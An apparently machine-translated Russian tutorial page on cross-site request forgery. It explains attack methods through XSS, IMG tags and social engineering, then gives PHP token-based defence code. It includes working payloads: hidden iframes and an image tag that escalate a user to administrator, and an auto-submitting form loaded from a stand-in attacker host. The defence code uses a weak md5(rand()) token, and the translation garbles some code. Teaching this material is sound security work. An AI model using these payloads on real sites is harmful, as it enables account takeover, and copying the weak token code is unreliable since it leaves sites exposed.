Вам бонус- начислено 1 монета за дневную активность. Сейчас у вас 1 монета

Подделка межсайтовых запросов кратко

Практика



Подделка межсайтовых запросов ( CSRF / XSRF ), так называемая атака одним нажатием, перехватывающая атака или перехват сеансов, является разновидностью вредоносного использования веб-сайтов.

 Подделка межсайтовых запросов

Описание

CSRF-атаки могут позволить злоумышленнику захватить учетную запись жертвы, что может привести к подделке вредоносных запросов под этой учетной записью. Правильная эксплуатация CSRF позволяет выйти из системы, перевести деньги, изменить пароль, изменить информацию, создавать сообщения, изменять статус пользователя; все это выполняется из учетной записи жертвы.

Атака CSRF не только относительно проста в достижении, но может быть очень трудно обнаружить саму атаку. Это связано с тем, что атаки кажутся совершенными законным пользователем.

Строгость

умеренный

Эксплойт Вероятность

Очень высоко

How-To / Информация

Существует ряд методов, которые можно использовать для атаки CSRF. Наиболее распространенные формы атаки: XSS , тэги IMG и социальная инженерия.

XSS метод атаки часто проще при условии , что недостаток XSS был найден в целевом сайте.

Социальную инженерию может быть сложнее достичь, так как важно завоевать доверие жертв и создать отдельную страницу для использования уязвимости.

Метод XSS

Основная предпосылка этого метода - внедрить JavaScript в целевой сайт и выполнить запрос как пользователь-жертва. Этот метод, конечно, зависит от дыры в XSS, существующей на веб-сайте, и может использоваться (например) для повышения статуса пользователя до административного.

Следующее будет работать, если административная страница использует $ _GET () или $ _REQUEST () в качестве ввода:

< iframe  src = 'javascript: window.location = "http://www.example.com/admin.php?edituser=1337&addgroup=administrator";'  высота = '0'  ширина = '0'  стиль = 'граница: 0;'  / >

Аргументы высоты, ширины и стиля скрывают iframe, поэтому администратор ничего не подозревает, когда страница волшебным образом перенаправляет на страницу admin.php.

Следующее будет работать, если административная страница использует $ _POST () в качестве ввода:

1 - Создайте веб-страницу, размещенную где-то в Интернете, и используйте код, подобный следующему, измените входные данные формы при необходимости:

< html > 
< body > 
< form  action = ""  method = "post"  id = "formid" > 
	< input  type = "hidden"  name = "attack"  value = "valuegoeshere"  / > 
< / form > 
< script > document .getElementById ( 'FormID') представляет (). < / script > 
< / body >

2. Вставьте страницу в iframe на уязвимую страницу XSS следующим образом:

< iframe  src = 'http://www.evilsite.com/csrfrider.php'  height = '0'  width = '0'  style = 'border: 0;'  / >

Это заставит форму автоматически публиковать на странице администрирования, если администратор загружает ее. Поскольку он скрывается в iframe, ему практически не требуется социальная инженерия, чтобы администратор мог загрузить страницу.

IMG инъекция

Подобно встраиванию эксплойта CSRF в iframe, как описано в методе XSS, теги также можно использовать для сокрытия атаки CSRF. Наиболее распространенные из этих атак используются в системах досок объявлений. Аватары и теги [img] часто практически не проверяют и часто являются горячей точкой для точек атаки CSRF.

Встраивание CSRF-атаки в теги [img], в свою очередь, будет выглядеть следующим образом в источнике HTML:

< img  src = 'http://www.example.com/admin.php?edituser=1337&addgroup=administrator'  / >

Когда к странице обращается авторизованный пользователь (администратор), происходит злонамеренная атака, и у администратора не будет немедленного указания на то, что произошла атака.

Конечно, если на сайте не обнаружено недостатков XSS, а метод IMG не работает, социальная инженерия всегда может иметь место. Для этого потребуется связаться с администратором и заставить его щелкнуть ссылку, которая примет его вредоносный скрипт. Это может быть просто скрытие URL-адреса $ _GET с помощью tinyurl или требование администратора получить доступ к вашему вредоносному сценарию публикации. Это немного более рискованно, поскольку часто более прослеживаемо, чем предыдущие методы.

защита

Хотя использование метода POST для всех форм поможет защитить от CSRF-атак, он не является пуленепробиваемым. Рекомендуемый способ защиты от CSRF-атак - использование уникальных токенов в формах. Токен используется внутри скрытого элемента в форме, чтобы доказать, что запрос не подделан. Каждый токен уникален для пользователя и сохраняется в сеансе пользователя. Чтобы настроить токены, используйте следующий код:

session_start ( ) ; 
if (  ! isset (  $ _SESSION [ 'token' ]  )  ) 
{ 
	$ token  =  md5 (  rand ( )  ) ; 
	$ token  =  str_split (  $ token ,  10  ) ; 
	$ _SESSION [ 'token' ]  =  $ token [ 0 ] ; 
}

Выше будет создан токен и сохранен в сеансе пользователя. Скрытое значение должно находиться в форме ввода следующим образом:

< input  type = 'hidden'  name = 'token'  value = ' token ']?> ' />

Третья часть проверки токена заключается в добавлении проверки следующим образом:

if (  $ _POST [ 'token' ]  ==  $ _SESSION [ 'token' ]  ) 
{ 
	/ * Токен действителен, продолжить * / 
}

Ссылки

создано: 2020-07-02
обновлено: 2021-03-13
129



Рейтиг 9 of 10. count vote: 2
Вы довольны ?:


Поделиться:

Найди готовое или заработай

С нашими удобными сервисами без комиссии*

Как это работает? | Узнать цену?

Найти исполнителя
$0 / весь год.
  • У вас есть задание, но нет времени его делать
  • Вы хотите найти профессионала для выплнения задания
  • Возможно примерение функции гаранта на сделку
  • Приорететная поддержка
  • идеально подходит для студентов, у которых нет времени для решения заданий
Готовое решение
$0 / весь год.
  • Вы можите продать(исполнителем) или купить(заказчиком) готовое решение
  • Вам предоставят готовое решение
  • Будет предоставлено в минимальные сроки т.к. задание уже готовое
  • Вы получите базовую гарантию 8 дней
  • Вы можете заработать на материалах
  • подходит как для студентов так и для преподавателей
Я исполнитель
$0 / весь год.
  • Вы профессионал своего дела
  • У вас есть опыт и желание зарабатывать
  • Вы хотите помочь в решении задач или написании работ
  • Возможно примерение функции гаранта на сделку
  • подходит для опытных студентов так и для преподавателей

Комментарии


Оставить комментарий
Если у вас есть какое-либо предложение, идея, благодарность или комментарий, не стесняйтесь писать. Мы очень ценим отзывы и рады услышать ваше мнение.
To reply

информационная безопасность - Криптография и Криптоанализ. Стеганография. Защита Информации

Термины: информационная безопасность - Криптография и Криптоанализ. Стеганография. Защита Информации